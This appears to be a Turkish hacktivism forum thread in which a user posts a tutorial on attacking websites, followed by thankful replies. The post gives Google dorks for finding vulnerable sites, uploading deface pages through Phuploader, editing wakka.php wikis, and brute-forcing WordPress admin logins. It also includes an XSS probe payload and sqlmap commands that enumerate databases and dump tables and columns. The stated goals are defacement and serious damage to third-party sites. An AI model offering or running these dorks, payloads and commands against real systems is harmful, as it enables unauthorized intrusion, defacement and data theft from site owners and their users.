ghostkurts
Uzman Üye
- Katılım
- 12 Mayıs 2021
- Mesajlar
- 236
- Tepkime puanı
- 3,862
- İlgi Alanlarınız
- Acı
- Cinsiyet
-
- Erkek
Hacktivizm içerisinde gerçekleştirmeyi düşündüğünüz tüm ticaretlerde, dikkat ve önlem sahibi olun.
Forum içerisinde yaşadığınız tüm sorunlar için sohbet alanını ya da sayfanın altında belirtilen Telegram kanalımızı kullanın.
Türkçemizi her bakımdan doğru kullanın ve forum kurallarına uygun paylaşımlar yapmaya özen gösterin.
Ekledim aslında :/Eline Sağlık knk hidde ekle emegin boşa gitmesin çalıyorlar konuları bide etkileşimin artar
Eline sağlık teşekkürler1 - Upload Açığı ile site hackleme
Dork: intitle:"Powered by Phuploader"
Bunu Googlede aratırıyoruz ve sitelere tek tek indeximizin resmini yada html dosyasını yüklüyoruz.
2 - Waka wikii açığı ile hackleme
Dork: wakka.php?wiki=
Örnk: hacktivizm.org/wikini/wakka.php?"wiki=7juin/edit" linkin sonuna /edit koyuyoruz
Not: Siteye zarar vermez sadece zone kasmak icin kullanılabilir
3 - Brute Force ( Kaba Kuvvet )
Bu bir açık değildir. site üzerinde belirlenen admin - admin listesini kontrol eder ve olumlu sonucları size gösterir.
Dorukumuz:
/wp-content/plugins/hits
/wp-content/plugins/last
/wp-content/plugins/send
/wp-content/plugins/note
/wp-content/plugins/climb
/wp-content/plugins/sorry
/wp-content/plugins/gear
/wp-content/plugins/nothing
/wp-content/plugins/all
/wp-content/plugins/after
Arama motor isimli programımıza yapıştırıp araya basıyoruz bulunan siteleri kaydetip brute force adlı programımızı açıyoruz
Admin Ve Passlarımız ekliyip başlata basıyoruz. bulunan sonuclar alta gözükücektir. (DETAYLI BİLGİ İCİN @ghostkurts a instgram yolu ile iletisime geciniz)
4 - XSS Açığı
bu benim en çok kullandım açıklardan biridir.
Dorkumuz: index.php?id=
rasgele sitede bulunan arama butonlarına <script>alert(“Ghost Kurts”);</script> yapıştırıyoruz
Örnekhacktivizm.org/index.php?id=<script>alert(“Ghost Kurts”);</script> )
Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok
5 - SQL Açığı
En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz.
Bilgisiyarımıza sqlmap kurduktan sonra cmdye açıyoruz ve şu komutları yazıyoruz.
cd ..
cd ..
cd sqlmap
sqlmap.py -u www.hacktivizm.org/index.php?id=5 --dbs
Karşımızda Aşağılarda " available_database " Olacaktır Onun Altındakiler Bizim Databaselerimiz
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz
sqlmap.py -u www.hacktivizm.org/index.php?id=5 -D Databaseismi --tables
sqlmap.py -u www.hacktivizm.org/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump
SqlMap İndirme Linki: https://sqlmap.org/
30dkya yakın zaman harcadım alırım bir teşşekürü*** Hidden text: cannot be quoted. ***
Neden Olmamış :/Ekledim aslında :/
EyvallahEline sağlık teşekkürler
Aynenilk 3 salla 0nlar öyle hecktir defacedir sayılmaz diğerleri iyidir he ama senin dedigin xss refled moruk onunla deface edilmez bi sayfa stored bulursan işe yarar aksi taktirde öyle zone nin bi faydası olmaz
Es*** Hidden text: cannot be quoted. ***
look*** Hidden text: cannot be quoted. ***
eline sağlık kral*** Hidden text: cannot be quoted. ***
Eline sağlık*** Hidden text: cannot be quoted. ***
eyvallahKod:KONUNU ŞU IKI KODUN ARASINA ALARAK YAZMALISIN *** Hidden text: cannot be quoted. ***
eyvallah
Eline sağlık kardeşim*** Hidden text: cannot be quoted. ***
eywEline sağlık kardeşim